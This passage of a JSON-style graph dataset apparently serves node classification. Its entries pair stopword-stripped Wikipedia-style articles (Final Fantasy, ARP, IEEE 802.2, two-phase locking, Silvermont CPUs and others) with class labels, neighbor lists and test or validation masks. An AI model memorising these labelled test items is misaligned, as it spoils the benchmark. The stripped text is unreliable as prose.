princess sara evil knight garland king coneria builds bridge enables light warriors passage east town pravoka light warriors liberate town bikke band pirates acquire pirates ship use warriors embark chain delivery quests shores aldi sea first retrieve stolen crown marsh cave king ruined castle turns dark elf astos defeating gains crystal eye return blind witch matoya exchange herb needed awaken elf prince cursed astos elf prince gives light warriors mystic key capable unlocking door key unlocks storage room coneria castle holds tnt nerrick one dwarves cave dwarf/dwarf village destroys small isthmus using tnt connecting aldi sea outside world visiting near-ruined town melmond light warriors go earth cave defeat vampire retrieve star ruby gains passage sage sadda cave sadda rod warriors venture deeper earth cave destroy earth fiend lich light warriors obtain canoe enter gurgu volcano defeat fire fiend kary levistone nearby ice cave allows raise airship reach northern continents prove courage retrieving rat tail castle ordeal king dragons bahamut promotes light warrior kind gesture repaid fairy receiving special liquid produces oxygen warriors use help defeat water fiend kraken sunken shrine also recover slab allows linguist named dr. unne teach lefeinish language lefeinish give light warriors access floating castle tiamat wind fiend taken four fiends defeated orbs restored portal opens temple fiends takes 2000 years past warriors discover four fiends sent garland archdemon chaos back time sent fiends future creating time loop could live forever light warriors defeat chaos thus ending paradox return home ending paradox however light warriors changed future one heroic deeds remain unknown outside legend hironobu sakaguchi intended make role-playing game rpg long time employer square refused give permission expected low sales product however rpg dragon quest released proved hit japan company reconsidered stance genre approved sakaguchi vision rpg inspired three colleagues volunteered join project headed thought rough boss spite unsuccessful creations eventually final fantasy developed team seven core staff members within square referred a-team sakaguchi convinced fellow game designers koichi ishii akitoshi kawazu join project kawazu mainly responsible battle system sequences based heavily tabletop game dungeons dragons rpg wizardry example enemies weaknesses elements fire ice included japanese rpgs point kawazu grown fond aspects western rpgs decided incorporate final fantasy also advocated player option freely choose party member classes beginning game feels fun rpg begins create character scenario written freelance writer kenji terada based story sakaguchi ishii heavily influenced game setting idea crystals also suggested illustrator yoshitaka amano character designer sakaguchi declined first never heard artist name sakaguchi showed ishii drawings magazine clippings told art style looking ishii revealed actually created amano hence leading involvement game music final fantasy composed nobuo uematsu marked 16th video game music composition iranian-american programmer nasir gebelli hired code game initially tried understand aspects gameplay soon advised sakaguchi program design concepts explain everything gebelli detail gebelli also responsible creating considered first rpg minigame sliding puzzle added game despite part original game design among developers graphic designer kazuko shibuya programmers kiyoshi yoshii ken narita well debugger hiroyuki ito project started show promise designer hiromichi tanaka b-team joined aid development lack faith sakaguchi team well unpopularity within company motivated staff members give best sakaguchi took in-development rom game japanese magazine famicom tsushin would review however famitsu gave game extensive coverage initially 200,000 copies shipped sakaguchi pleaded company make 400,000 help spawn sequel management agreed original nes version successfully shipped 520,000 copies japan following successful north american localization dragon quest nintendo america translated final fantasy english published north america 1990 north american version final fantasy met modest success partly due nintendo then-aggressive marketing tactics version game marketed pal region final fantasy origins 2003 years several theories emerged game called final fantasy 2015 sakaguchi stated beginning team wished name could shortened way game title could abbreviated latin script pronounced four syllables japanese language original working title sakaguchi rpg concept fighting fantasy changed avoid issues tabletop game name already released reason choosing word final form eventual title final fantasy explained twofold uematsu one thing stemmed sakaguchi personal situation would quit game industry gone back university game sold well another square threat bankruptcy time meant game could company last although sakaguchi confirmed theories later downplayed rationale choosing word final saying definitely back-to-the-wall type situation back word starts f would fine final fantasy remade several times different platforms frequently packaged final fantasy ii various collections remakes retain basic story battle mechanics various changes made different areas including graphics sound specific game elements final fantasy first re-released msx2 system published microcabin japan june 1989 access almost three times much storage space famicom version suffered problems present nintendo cartridge media including noticeable loading times also minor graphical upgrades much-improved music tracks sound effects 1994 final fantasy i・ii compilation final fantasy final fantasy ii launched famicom version released japan graphical updates wonderswan color remake released japan december 9 2000 featured many new graphical changes 8-bit graphics original famicom game updated battle scenes incorporated full background images character enemy sprites redrawn look like ones super famicom final fantasy games japan final fantasy final fantasy ii re-released separately combined game playstation collection released japan 2002 final fantasy ii premium package europe north america 2003 final fantasy origins version similar wonderswan color remake featured several changes detailed graphics remixed soundtrack added full motion video sequences art galleries yoshitaka amano illustrations memo save function december 18 2012 port re-released part final fantasy 25th anniversary ultimate box release final fantasy ii dawn souls like final fantasy origins port first two games series released game boy advance 2004 dawn souls version incorporates various new elements including four additional dungeons updated bestiary minor changes square enix released version final fantasy two japanese mobile phone networks 2004 version ntt docomo foma 900i series launched march title final fantasy subsequent release cdma 1x win-compatible phones launched august another titular version released softbank yahoo keitai phones july 3 2006 games refined graphics compared original 8-bit game advanced many later console handheld ports square enix planned release version north american mobile phones 2006 delayed 2010 released collaboration namco retains game difficulty mp system original famicom version elements updated graphics spell names monster names bosses items areas borrowed game boy advance wonderswan color versions including additional areas monsters present gba version game data saved original famicom version using tent sleeping bag cottage going inn however three save game slots temporary save option available game 20th anniversary final fantasy square enix remade final fantasy final fantasy ii playstation portable games released japan north america 2007 european territories 2008 psp version features higher-resolution 2d graphics full motion video sequences remixed soundtrack new dungeon well bonus dungeons dawn souls script dawn souls version aside new dungeon square enix released original nes version game wii virtual console service japan may 26 2009 north america october 5 2009 pal region import may 7 2010 february 25 2010 square enix released ios version final fantasy based psp port touch controls worldwide june 13 2012 square enix released windows phone version based ios version july 27 2012 square enix released android port largely based ios version though lacking new dungeons 20th-anniversary edition november 11 2016 game alongside 29 games included nes classic edition nintendo classic mini nintendo entertainment system released nintendo final fantasy well received critics commercially successful original nes version shipped 520,000 copies japan according square publicity department japanese famicom msx releases sold combined 600,000 copies north american nes release sold 700,000 copies march 31 2003 game including re-releases remakes time shipped 1.99 million copies worldwide 1.21 million copies shipped japan 780,000 abroad november 19 2007 another playstation portable version shipped 140,000 copies editors ign ranked final fantasy 11th best game nes calling game class system diverse praising convenient use vehicles means traveling across world map gamesradar ranked eighth best nes game ever made staff felt dragon warrior introduced gamers genre final fantasy popularized 2004 readers retro gamer voted final fantasy 93rd top retro game staff noting despite poor visuals relatively simple quest many still consider original best exception ffvii 2006 final fantasy appeared japanese magazine famitsu top 100 games list readers voted 63rd best game time gamefaqs users made similar list 2005 ranked final fantasy 76th rated 49th best game made nintendo system nintendo power top 200 games list 2008 nintendo power ranked 19th best nintendo entertainment system video game praising setting basics console role-playing games along dragon warrior citing examples epic stories leveling random battles character classes final fantasy one influential early console role-playing games played major role legitimizing popularizing genre according ign matt casamassina final fantasy storyline deeper engaging story original dragon quest known dragon warrior north america modern critics pointed game poorly paced contemporary standards involves much time wandering search random battle encounters raise experience levels money exploring solving puzzles reviewers find level-building exploration portions game amusing ones 1987 famitsu initially described original final fantasy one many imitated dragon quest formula game considered weakest difficult installment series subsequent versions final fantasy garnered mostly favorable reviews media peer schneider ign enjoyed wonderswan color version praising graphical improvements especially environments characters monsters famitsu scored version 30 40 final fantasy origins generally well-received gamepro said music fantastic graphics suitably retro cuteness reviews generally positive jeremy dunham ign giving particular praise improved english translation saying better previous version game playstation portable version critically successful previous releases gamespot kevin vanord cited visuals strongest enhancement stated additional random enemy encounters updated graphics add much value dawn souls package rated 76th nintendo power top 200 games list soundtrack album released together score final fantasy ii 1989 game tracks became mainstays final fantasy series prelude arpeggio played title screen opening theme played party crosses bridge early game later referred final fantasy theme victory fanfare played every victorious battle opening motif battle theme also reused number times series theme song plays player characters first cross bridge coneria become recurring theme music series featured numbered final fantasy titles final fantasy also basis series finale video game-themed cartoon series entitled fractured fantasy captain n 8-bit theater sprite-based webcomic created brian clevinger parodies game become popular gaming community since started march 2001 elements video game also appeared series fighting games dissidia final fantasy dissidia 012 final fantasy dissidia final fantasy nt warrior light based yoshitaka amano design lead character garland respective hero villain representing final fantasy warrior light voiced toshihiko seki japanese version grant george english version garland voiced kenji utsumi dissidia final fantasy 012 dissidia final fantasy kōji ishii dissidia final fantasy nt japanese versions christopher sabat english versions games add background information world final fantasy instance dissidia 012 final fantasy names world final fantasy world order distinguish world b world dissidia characters music final fantasy also appeared theatrhythm final fantasy series",
    "neighbors": [
      5762,
      9673,
      5260,
      5422,
      7023,
      9006,
      4530,
      10931,
      7166,
      8735
    ],
    "mask": "Test"
  },
  {
    "node_id": 5437,
    "label": 5,
    "text": "Address_Resolution_Protocol:address resolution protocol address resolution protocol arp communication protocol used discovering link layer address mac address associated given internet layer address typically ipv4 address mapping critical function internet protocol suite arp defined 1982 internet standard std 37 arp implemented many combinations network data link layer technologies ipv4 chaosnet decnet xerox parc universal packet pup using ieee 802 standards fddi x.25 frame relay asynchronous transfer mode atm ipv4 ieee 802.3 ieee 802.11 common usage internet protocol version 6 ipv6 networks functionality arp provided neighbor discovery protocol ndp address resolution protocol request-response protocol whose messages encapsulated link layer protocol communicated within boundaries single network never routed across internetworking nodes property places arp link layer internet protocol suite address resolution protocol uses simple message format containing one address resolution request response size arp message depends link layer network layer address sizes message header specifies types network use layer well size addresses message header completed operation code request 1 reply 2 payload packet consists four addresses hardware protocol address sender receiver hosts principal packet structure arp packets shown following table illustrates case ipv4 networks running ethernet scenario packet 48-bit fields sender hardware address sha target hardware address tha 32-bit fields corresponding sender target protocol addresses spa tpa arp packet size case 28 bytes arp protocol parameter values standardized maintained internet assigned numbers authority iana ethertype arp 0x0806 appears ethernet frame header payload arp packet confused ptype appears within encapsulated arp packet two computers office computer 1 computer 2 connected local area network ethernet cables network switches intervening gateways routers computer 1 packet send computer 2 dns determines computer 2 ip address 192.168.0.55 send message also requires computer 2 mac address first computer 1 uses cached arp table look 192.168.0.55 existing records computer 2 mac address 00 eb:24 b2:05 ac mac address found sends ethernet frame destination address 00 eb:24 b2:05 ac containing ip packet onto link cache produce result 192.168.0.55 computer 1 send broadcast arp request message destination ff ff ff ff ff ff mac address accepted computers local network requesting answer 192.168.0.55 computer 2 responds arp response message containing mac ip addresses part fielding request computer 2 may insert entry computer 1 arp table future use computer 1 receives caches response information arp table send packet arp probe arp request constructed all-zero sender ip address spa term used ipv4 address conflict detection specification beginning use ipv4 address whether received manual configuration dhcp means host implementing specification must test see address already use broadcasting arp probe packets arp may also used simple announcement protocol useful updating hosts mappings hardware address sender ip address mac address changed announcement also called gratuitous arp message usually broadcast arp request containing sender protocol address spa target field tpa=spa target hardware address tha set zero alternative way broadcast arp reply sender hardware protocol addresses sha spa duplicated target fields tpa=spa tha=sha gratuitous arp request message gratuitous arp reply messages standards-based methods arp request preferred devices may configured use either two types garp arp announcement intended solicit reply instead updates cached entries arp tables hosts receive packet operation code may indicate request reply arp standard specifies opcode processed arp table updated address fields many operating systems perform gratuitous arp startup helps resolve problems would otherwise occur example network card recently changed changing ip-address-to-mac-address mapping hosts still old mapping arp caches gratuitous arp also used interface drivers provide load balancing incoming traffic team network cards used announce different mac address within team receive incoming packets arp announcements used defend link-local ip addresses zeroconf protocol ip address takeover within high-availability clusters arp mediation refers process resolving layer 2 addresses virtual private wire service vpws different resolution protocols used connected circuits e.g. ethernet one end frame relay ipv4 provider edge pe device discovers ip address locally attached customer edge ce device distributes ip address corresponding remote pe device pe device responds local arp requests using ip address remote ce device hardware address local pe device ipv6 pe device discovers ip address local remote ce devices intercepts local neighbor discovery nd inverse neighbor discovery ind packets forwards remote pe device inverse address resolution protocol inverse arp inarp used obtain network layer addresses example ip addresses nodes data link layer layer 2 addresses primarily used frame relay dlci atm networks layer 2 addresses virtual circuits sometimes obtained layer 2 signaling corresponding layer 3 addresses must available virtual circuits used since arp translates layer 3 addresses layer 2 addresses inarp may described inverse addition inarp implemented protocol extension arp uses packet format arp different operation codes reverse address resolution protocol reverse arp rarp like inarp translates layer 2 addresses layer 3 addresses however inarp requesting station queries layer 3 address another node whereas rarp used obtain layer 3 address requesting station address configuration purposes rarp obsolete replaced bootp later superseded dynamic host configuration protocol dhcp arp provide methods authenticating arp replies network arp replies come systems one required layer 2 address arp proxy system answers arp request behalf another system forward traffic normally part network design dialup internet service contrast arp spoofing answering system spoofer replies request another system address aim intercepting data bound system malicious user may use arp spoofing perform man-in-the-middle denial-of-service attack users network various software exists detect perform arp spoofing attacks though arp provide methods protection attacks ipv6 uses neighbor discovery protocol extensions secure neighbor discovery rather arp computers also maintain lists known addresses rather using active protocol model computer maintains database mapping layer 3 addresses e.g. ip addresses layer 2 addresses e.g. ethernet mac addresses data maintained primarily interpreting arp packets local network link thus often called arp cache traditionally methods also used maintain mapping addresses static configuration files centrally maintained lists since least 1980s networked computers utility called 'arp interrogating manipulating table embedded systems networked cameras networked power distribution devices lack user interface use so-called arp stuffing make initial network connection although misnomer arp involved solution issue network management consumer devices specifically allocation ip addresses ethernet devices solution adopted follows devices typically method disable process device operating normally vulnerable attack",
    "neighbors": [
      10242,
      1030,
      2568,
      6674,
      8211,
      6681,
      6682,
      8729,
      4638,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9780,
      9269,
      11321,
      3133,
      5181,
      6723,
      11332,
      6214,
      71,
      8265,
      4174,
      4687,
      10329,
      10332,
      9824,
      10341,
      10344,
      1647,
      3695,
      9839,
      4723,
      2679,
      4729,
      8834,
      5251,
      9860,
      649,
      6281,
      9868,
      6797,
      3218,
      9365,
      5270,
      6295,
      152,
      4248,
      11413,
      2206,
      3742,
      4771,
      9380,
      9381,
      3751,
      3752,
      7847,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      7356,
      4797,
      702,
      10428,
      7364,
      8905,
      1229,
      1741,
      4307,
      5843,
      1750,
      216,
      9946,
      10461,
      1246,
      7391,
      3297,
      2797,
      751,
      8432,
      4850,
      5875,
      7411,
      8946,
      3318,
      3322,
      5371,
      6396,
      9980,
      4863,
      9987,
      3847,
      3856,
      1297,
      10005,
      6422,
      1303,
      5402,
      4891,
      5405,
      8487,
      808,
      9511,
      7984,
      10033,
      10035,
      8504,
      2362,
      10748,
      829,
      7486,
      5439,
      2373,
      8517,
      2887,
      841,
      10058,
      849,
      1876,
      3927,
      2904,
      4953,
      7003,
      5469,
      5470,
      5471,
      2912,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      6506,
      5486,
      367,
      5490,
      891,
      6524,
      6013,
      2430,
      2431,
      11647,
      3970,
      10115,
      10631,
      7049,
      6541,
      7570,
      5531,
      10144,
      4001,
      10659,
      933,
      2983,
      9640,
      7088,
      6577,
      2996,
      5045,
      1978,
      10171,
      3006,
      960,
      9670,
      2509,
      8669,
      5598,
      8670,
      10723,
      10727,
      3564,
      9709,
      2545,
      11249,
      8692,
      4085,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 5438,
    "label": 7,
    "text": "Bootstrapping_node:bootstrapping node bootstrapping node also known rendezvous host node overlay network provides initial configuration information newly joining nodes may successfully join overlay network bootstrapping nodes predominantly found decentralized peer-to-peer p2p networks dynamically changing identities configurations member nodes networks attempting join p2p network specific discovery membership protocols configuration information may required newly joining node unaware protocols newly established joining node able communicate nodes ultimately join network furthermore protocols configuration requirements may dynamically change infrastructure membership p2p network evolves therefore need able dynamically inform newly joining node required protocols configurations several methods may used joining node identify bootstrapping nodes objective bootstrapping node provide newly joining nodes sufficient configuration information new node may successfully join network access resources shared content discovery protocol information instruct new node discover peers network membership protocol information instruct new node request-to-join subsequently join peer groups network configuration information overlay network dependent instructions may provided example overlay dependent instructions instructing new node obtain zone configuration information may designed p2p network admission control used joining network supports trust management include things encryption/signature protocols admission policies",
    "neighbors": [
      8640,
      2887,
      10792,
      3629,
      1087
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5439,
    "label": 5,
    "text": "IEEE_802.2:ieee 802.2 ieee 802.2 original name iso/iec 8802-2 standard defines logical link control llc upper portion data link layer osi model original standard developed institute electrical electronics engineers ieee collaboration american national standards institute ansi adopted international organization standardization iso 1998 still remains integral part family ieee 802 standards local metropolitan networks llc software component provides uniform interface user data link service usually network layer llc may offer three types services conversely llc uses services media access control mac dependent specific transmission medium ethernet token ring fddi 802.11 etc. using llc compulsory ieee 802 networks exception ethernet also used fiber distributed data interface fddi part ieee 802 family ieee 802.2 sublayer adds control information message created upper layer passed llc transmission another node data link resulting packet generally referred llc protocol data unit pdu additional information added llc sublayer llc header llc header consist dsap destination service access point ssap source service access point control field two 8-bit fields dsap ssap allow multiplex various upper layer protocols llc however many protocols use subnetwork access protocol snap extension allows using ethertype values specify protocol transported atop ieee 802.2 also allows vendors define protocol value spaces 8 16 bit hdlc-style control field serves distinguish communication mode specify specific operation facilitate connection control flow control connection mode acknowledgements acknowledged connectionless mode ieee 802.2 provides two connectionless one connection-oriented operational modes use multicasts broadcasts reduce network traffic information needs propagated stations network however type 1 service provides guarantees regarding order received frames compared order sent sender even get acknowledgment frames received device conforming ieee 802.2 standard must support service type 1 network node assigned llc class according service types supports 802.2 llc pdu following format subnetwork access protocol snap extension used located start information field 802.2 header includes two eight-bit address fields called service access points sap collectively lsap osi terminology although lsap fields 8 bits long low-order bit reserved special purposes leaving 128 values available purposes low-order bit dsap indicates whether contains individual group address low-order bit ssap indicates whether packet command response packet remaining 7 bits ssap specify lsap always individual address packet transmitted lsap numbers globally assigned ieee uniquely identify well established international standards protocols families protocols assigned one saps may operate directly top 802.2 llc protocols may use subnetwork access protocol snap ieee 802.2 indicated hexadecimal value 0xaa 0xab source response ssap dsap snap extension allows using ethertype values private protocol id spaces ieee 802 networks used datagram connection-oriented network services ethernet ieee 802.3 networks exception ieee 802.3x-1997 standard explicitly allowed using ethernet ii framing 16-bit field mac addresses carry length frame followed ieee 802.2 llc header ethertype value followed upper layer data framing datagram services supported data link layer although ipv4 assigned lsap value 6 0x6 arp assigned lsap value 152 0x98 ipv4 almost never directly encapsulated 802.2 llc frames without snap headers instead internet standard rfc 1042 usually used encapsulating ipv4 traffic 802.2 llc frames snap headers fddi ieee 802 networks ethernet ethernet networks typically use ethernet ii framing ethertype 0x800 ip 0x806 arp ipx protocol used novell netware networks supports additional ethernet frame type 802.3 raw ultimately supporting four frame types ethernet 802.3 raw 802.2 llc 802.2 snap ethernet ii two frame types fddi non-ethernet ieee 802 networks 802.2 llc 802.2 snap possible use diverse framings single network possible even upper layer protocol case nodes using unlike framings directly communicate following destination source sap fields control field ieee 802.2 conceptually derived hdlc three types pdus carry data most-often used unacknowledged connectionless mode u-format used identified value '11 lower two bits single-byte control field",
    "neighbors": [
      8708,
      7045,
      9860,
      3847,
      7049,
      2827,
      2701,
      1297,
      5118,
      5270,
      2206,
      5671,
      6187,
      4396,
      434,
      3762,
      4918,
      3383,
      7865,
      11321,
      5437,
      4543,
      4546,
      3780,
      11332,
      1997,
      5071,
      2904,
      10332,
      5469,
      5472,
      1893,
      4581,
      5863,
      5875,
      11125,
      6904,
      3323,
      8828,
      3838,
      2431
    ],
    "mask": "Test"
  },
  {
    "node_id": 5440,
    "label": 4,
    "text": "InterWorking_Labs:interworking labs interworking labs privately owned company scotts valley california business optimizing application performance applications embedded systems founded 1993 chris wellens marshall rose first company formed specifically test network protocol compliance products tests allow computer devices many different companies communicate networks interworking labs products diagnose replicate re-mediate application performance problems company first product silvercreek tests simple network management protocol snmp agent implementation switch server phone hundreds thousands individual tests including conformance stress robustness negative testing tests detect diagnose implementation errors private standard mibs well snmpv1 v2c v3 stacks implementations maxwell family products emulate real world networks problems delays rerouting corruption impaired packets protocols domain name system delays limited bandwidth new impairments added maxwell using c c++ python extensions controlled via graphical command line script interfaces supports set protocol impairments tcp/ip dhcp icmp tls sip testing maxwell products named maxwell demon thought experiment 19th century physicist james clerk maxwell maxwell ’ demon demonstrated second law thermodynamics—which says entropy increases—is true average thought experiment maxwell imagined double chamber uniform mixture hot cold gas molecules demon intelligent sits two chambers operating trap door every time cold low-energy molecule comes demon opens door lets molecule side eventually cold gas molecules one side chamber hot ones although molecules continue move randomly introduction intelligence system reduces entropy instead increasing maxwell product sits middle network conversation opens closes figurative door basis specific criteria maxwell intelligently modifies packet based pre-selected criteria sends packet way interworking labs advised internet engineering task force ietf maxwell network emulations reproduce real conditions lab products deployed interworking labs co-founded 1993 chris wellens marshall rose two met 1992 interop company mountain view california wellens director technology rose interop program committee also working group chair ietf simple network management protocol snmp wellens—who overseeing trade fair 5000-node interopnet well array interoperability demonstrations network protocols— noticed engineers different companies often interpreted network protocols differently ended struggling make products send receive data one another—sometimes minutes showcase demonstrations engineers asked interop create interoperability lab network communication issues could worked private less stressful environment interop founder ceo dan lynch concluded industry needed interoperability testing lab lynch asked wellens write business plan permanent interoperability lab rose proposed lab first task create try set tests snmp protocol since snmp area familiar one engineers particular problems interop wellens volunteered organize group developers interoperability test summit rose would create set tests assist developing initial plan time however ziff-davis acquired interop chose proceed interoperability lab wellens lynch agreed pursue idea 1993 wellens established interworking labs january 1994 organized first snmp interoperability test summit using 50 snmp tests written rose first test summit large number implementations failed rose tests.. results persuaded several major corporations interoperability testing would critical component functioning networks participants second 1994 snmp test summit included cabletron systems cisco systems eicon technology empirical tools technologies epilogue technology corp. fujitisu ossi ibm ibm research network general corp. peer networks snmp research synoptics communications tgv inc. wellfleet communications 2000 wellens asked karl auerbach join interworking labs board directors 2002 wellens hired auerbach part cisco advanced internet architecture group serve chief technology officer interworking labs advisory board consisted several members ietf expertise networking protocols andy bierman jeff case dave perkins randy presuhn steve waldbusser wireless networks used hospitals police military turned computer networks essential lifeline utilities computer networks keep economies transportation energy food supplies flowing commonly belong critical infrastructure region performance networks adverse conditions significant concern militaries industry local regional governments according wellens ucita significantly protected software publishers liability failure products software publishers may become increasingly liable consequences network failures—especially comprehensive networking testing existed used online retailers example demonstrate multimillion-dollar losses due network problems security flaws network collapse denial service attack video links",
    "neighbors": [
      2887,
      8554,
      2045,
      6834,
      5402,
      3323,
      3133,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 5441,
    "label": 1,
    "text": "Two-phase_locking:two-phase locking databases transaction processing two-phase locking 2pl concurrency control method guarantees serializability also name resulting set database transaction schedules histories protocol utilizes locks applied transaction data may block interpreted signals stop transactions accessing data transaction life 2pl protocol locks applied removed two phases two types locks utilized basic protocol shared exclusive locks refinements basic protocol may utilize lock types using locks block processes 2pl may subject deadlocks result mutual blocking two transactions lock system object associated shared resource data item elementary type row database page memory database lock database object data-access lock may need acquired transaction accessing object correct use locks prevents undesired incorrect inconsistent operations shared resources concurrent transactions database object existing lock acquired one transaction needs accessed another transaction existing lock object type intended access checked system existing lock type allow specific attempted concurrent access type transaction attempting access blocked according predefined agreement/scheme practice lock object directly block transaction operation upon object rather blocks transaction acquiring another lock object needed held/owned transaction performing operation thus locking mechanism needed operation blocking controlled proper lock blocking scheme indicates lock type blocks lock type two major types locks utilized common interactions lock types defined blocking behavior follows several variations refinements major lock types exist respective variations blocking behavior first lock blocks another lock two locks called incompatible otherwise locks compatible often lock types blocking interactions presented technical literature lock compatibility table following example common major lock types according two-phase locking protocol transaction handles locks two distinct consecutive phases transaction execution two phase locking rule summarized never acquire lock lock released serializability property guaranteed schedule transactions obey rule typically without explicit knowledge transaction end phase 1 safely determined transaction completed processing requested commit case locks released phase 2 difference 2pl c2pl c2pl transactions obtain locks need transactions begin ensure transaction already holds locks block waiting locks conservative 2pl prevents deadlocks comply s2pl protocol transaction needs comply 2pl release write exclusive locks ended i.e. either committed aborted hand read shared locks released regularly phase 2 protocol appropriate b-trees causes bottleneck b-trees always starts searching parent root rigorousness rigorous scheduling rigorous two-phase locking comply strong strict two-phase locking ss2pl locking protocol releases write exclusive read shared locks applied transaction transaction ended i.e. completing executing ready becoming either committed aborted protocol also complies s2pl rules transaction obeying ss2pl viewed phase 1 lasts transaction entire execution duration phase 2 degenerate phase 2 thus one phase actually left two-phase name seems still utilized due historical development concept 2pl 2pl super-class ss2pl property schedule also called rigorousness also name class schedules property ss2pl schedule also called rigorous schedule term rigorousness free unnecessary legacy two-phase well independent locking mechanism principle blocking mechanisms utilized property respective locking mechanism sometimes referred rigorous 2pl ss2pl special case s2pl i.e. ss2pl class schedules proper subclass s2pl every ss2pl schedule also s2pl schedule s2pl schedules exist ss2pl ss2pl concurrency control protocol choice database systems utilized since early days 1970s proven effective mechanism many situations provides besides serializability also strictness special case cascadeless recoverability instrumental efficient database recovery also commitment ordering co participating distributed environments co based distributed serializability global serializability solutions employed subset co efficient implementation distributed ss2pl exists without distributed lock manager dlm distributed deadlocks see resolved automatically fact ss2pl employed multi database systems ensures global serializability known years discovery co co came understanding role atomic commitment protocol maintaining global serializability well observation automatic distributed deadlock resolution see detailed example distributed ss2pl matter fact ss2pl inheriting properties recoverability co significant subset 2pl general form besides comprising simple serializability mechanism however serializability also implied co known provide ss2pl significant qualities 2pl general form well combined strictness i.e. strict 2pl s2pl known utilized practice popular ss2pl require marking end phase 1 2pl s2pl thus simpler implement also unlike general 2pl ss2pl provides mentioned useful strictness commitment ordering properties many variants ss2pl exist utilize various lock types various semantics different situations including cases lock-type change transaction notable variants use multiple granularity locking comments two schedule classes define schedules respective properties common schedules either one contains strictly contains equal incomparable containment relationships among 2pl classes major schedule classes summarized following diagram 2pl subclasses inherently blocking means optimistic implementations exist whenever optimistic 2pl mentioned refers different mechanism class includes also schedules 2pl class locks block data-access operations mutual blocking transactions results deadlock execution transactions stalled completion reached thus deadlocks need resolved complete transactions executions release related computing resources deadlock reflection potential cycle precedence graph would occur without blocking deadlock resolved aborting transaction involved potential cycle breaking cycle often detected using wait-for graph graph conflicts blocked locks materialized conflicts materialized database due blocked operations reflected precedence graph affect serializability indicates transaction waiting lock release transaction cycle means deadlock aborting one transaction per cycle sufficient break cycle transaction aborted due deadlock resolution application decide next usually application restart transaction beginning may delay action give transactions sufficient time finish order avoid causing another deadlock distributed environment atomic commitment protocol typically two-phase commit 2pc protocol utilized atomicity recoverable data data transaction control partitioned among 2pc participants i.e. data object controlled single 2pc participant distributed global deadlocks deadlocks involving two participants 2pc resolved automatically follows ss2pl effectively utilized distributed environment global deadlocks due locking generate voting-deadlocks 2pc resolved automatically 2pc see commitment ordering co exact characterization voting-deadlocks global cycles reference except co articles known notice general case 2pl global deadlocks similarly resolved automatically synchronization point protocol phase-1 end distributed transaction synchronization point achieved voting notifying local phase-1 end propagated participants distributed transaction way decision point atomic commitment analogy decision point co conflicting operation 2pl happen phase-1 end synchronization point resulting voting-deadlock case global data-access deadlock voting-deadlock also locking based global deadlock automatically resolved protocol aborting transaction involved missing vote typically using timeout comment",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      7446,
      10518,
      4376,
      9112,
      5658,
      7581,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      10048,
      11457,
      3398,
      8518,
      72,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      9069,
      6383,
      5745,
      11377,
      9079,
      2681,
      9467,
      3326,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 5442,
    "label": 8,
    "text": "Hit_(Internet):hit internet hit request web server file web page image javascript cascading style sheet may many hits per page view since html page contain multiple files images",
    "neighbors": [
      225,
      3462,
      3688,
      9768,
      5935,
      6576,
      8914,
      5150
    ],
    "mask": "None"
  },
  {
    "node_id": 5443,
    "label": 7,
    "text": "M2Mi_Corporation:m2mi corporation machine-to-machine intelligence m2mi corp founded nasa research park moffett federal airfield provides authentic platform m2m internet things economy m2mi founded 2006 geoffrey barnard m2mi founding member oasis mqtt standards group geoffrey barnard served chair security sub-committee m2mi m2m intelligence® application provides m2m iot application globally connect manage secure perform in-stream analysis quickly monetize organization connected assets strong focus cybersecurity privacy m2mi also provides iot security suite professional edition™ designed securing industrial applications enforcing specific industry compliance allows organizations quickly generate deploy iot device code comply industry ’ regulations professional edition includes means device owners monitor devices health using intuitive dashboards alerts group commands insight analytics includes set optimized ciphers resource limited devices iot security suite professional edition™ designed handle security across devices iot gateways network infrastructures",
    "neighbors": [
      4194,
      4979
    ],
    "mask": "Test"
  },
  {
    "node_id": 5444,
    "label": 3,
    "text": "Silvermont:silvermont silvermont microarchitecture low-power atom celeron pentium branded processors used systems chip socs made intel silvermont forms basis total four soc families silvermont announced news media may 6 2013 intel headquarters santa clara california intel repeatedly said first bay trail devices would available holiday 2013 timeframe leaked slides showed release window bay trail-t august 28 – september 13 2013 avoton rangeley announced available second half 2013 first merrifield devices announced 1h14 airmont 14 nm die shrink silvermont launched early 2015 first seen atom x7-z8700 used microsoft surface 3 airmont microarchitecture includes following soc families silvermont based cores also used modified knight landing iteration intel xeon phi hpc chips silvermont first atom processor feature out-of-order architecture intel revealed q4 2016 quarterly report quality issues c2000 product family effect financial performance company data center group quarter erratum named avr54 published intel state defect chip lpc clock affected systems may experience inability boot may cease operation workaround available requiring platform hardware changes soc failures thought led failures cisco synology products though discussion c2000 root cause failure reported non-disclosure agreement many vendors intel released new c0 stepping c2000 series april 2017 corrected bug july 2017 intel published similar quality issue affects also atom e3800 series embedded processors erratum named vli89 published intel state similar issue atom c2000 defect chip lpc clock affected systems may experience inability boot may cease operation issues extend also usb bus sd card circuitry happen certain conditions activity high several years april 2018 intel announced releasing new d1 stepping fix issue lpc usb sd card buses circuitry degradation issues also apply bay trail processors intel celeron j1900 n2800/n2900 series also pentium n3500 j2850 j2900 series celeron j1800 j1750 series based affected silicon cisco stated failures atom c2000 processors occur early 18 months use higher failure rates occurring 36 months mitigations found limit impact systems firmware update lpc bus called lpc_clkrun reduces utilization lpc interface turn decreases eliminates lpc bus degradation systems however compatible new firmware usb maximum 10 active time 50tb transmit traffic life expectancy lifetime port recommended use sd card boot device remove card system use 14nm airmont architecture processors also affected design flaws noted braswell specification update chp49 errata addition lpc sd card circuitry degradation issues 14nm designs also issues real time clock rtc circuitry degradation usb buses however affected unspecified firmware changes required mitigate rtc circuitry degradation intel plan release new stepping braswell intel admitted issue stating impact consumers depends use condition list desktop processors follows found bug blueprint c2000 cpus family may cause failure embedded ethernet ports list server processors follows list upcoming communications processors follows list embedded processors follows list mobile processors follows list tablet hybrid processors follows list smartphone processors follows list smartphone processors follows list desktop processors follows list mobile processors follows list smartphone tablet processors 